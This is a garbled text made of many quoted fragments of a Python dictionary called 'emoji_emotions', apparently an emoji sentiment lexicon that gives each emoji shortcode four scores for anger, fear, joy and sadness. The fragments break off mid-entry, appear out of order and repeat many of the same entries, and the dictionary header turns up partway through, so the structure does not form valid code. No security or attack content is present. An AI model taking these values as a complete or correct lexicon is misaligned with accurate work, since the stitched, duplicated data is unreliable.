0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": 
[0.07400000000000001, 0.19699999999999998, 0.14300000000000002,", "0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998,", "0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214],", "0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106,", "0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242],", "\":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001,", "0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276],", "0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115,", "0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\":", "[0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25,", "0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001,", "0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": 
[0.092,", "[0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187,", "0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\":", "[0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998,", "[0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345,", "\":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162,", "\":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136,", "0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\":", "0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\":", "0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212,", "0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326],", "0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\":", "[0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305,", 
"[0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095,", "0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142,", "0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15,", "\":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996,", "0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\":", "0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\":", "[0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136,", "0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349,", "0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998],", "0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067,", "0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415,", "joy, sadness emoji_emotions = { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141,", "0.15, 
0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214],", "0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\":", "\":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196,", "\":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214,", "\":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999,", "[0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001,", "0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\":", "0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\":", "\":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997,", "0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999,", "0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065,", "0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25,", "0.262], \":memo:\": [0.147, 
0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157,", "[0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001,", "\":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179,", "\":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295,", "0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\":", "0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151],", "0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998,", "[0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163,", "0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171,", "[0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171,", "0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094],", "0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361],", 
"0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106],", "\":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126,", "0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147],", "[0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997,", "\":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002,", "0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159],", "[0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231,", "0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998],", "\":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22,", "0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003],", "\":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001,", "0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335],", "anger, fear, joy, sadness 
emoji_emotions = { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\":", "0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\":", "0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\":", "0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109],", "[0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253,", "0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\":", "\":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218,", "[0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256,", "\":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997,", "\":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297,", "0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233,", "\":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396,", "[0.301, 0.29, 0.235, 0.20199999999999999], 
\":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003,", "\":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109,", "\":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182,", "\":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242,", "\":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263,", "0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22],", "\":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212,", "\":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248,", "\":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22,", "0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289],", "0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153,", "0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003],", "0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195,", 
"\":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183,", "[0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319,", "\":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201,", "\":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276,", "0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128],", "0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09,", "[0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069,", "0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\":", "0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\":", "0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122,", "0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998,", "0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264],", "0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 
0.22399999999999998],", "[0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198,", "[0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174,", "0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249,", "[0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292,", "0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\":", "0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\":", "[0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003,", "0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\":", "\":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002,", "[0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128,", "0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084],", "\":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 
0.172,", "0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\":", "\":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004,", "0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998],", "0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\":", "[0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392,", "0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996,", "\":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147,", "0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233],", "0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235,", "\":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001,", "[0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994,", "\":Japanese_post_office:\": 
[0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162,", "0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214,", "[0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317,", "0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\":", "[0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998,", "0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157,", "0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\":", "0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131,", "\":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002,", "0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\":", "0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128,", "0.18899999999999997, 0.282], 
\":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\":", "\":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156,", "0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\":", "0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124,", "0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\":", "0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128,", "\":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002,", "0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\":", "0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\":", "0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\":", "0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139],", "\":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18,", "0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 
0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152],", "[0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002,", "0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223,", "\":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255,", "[0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222,", "[0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], 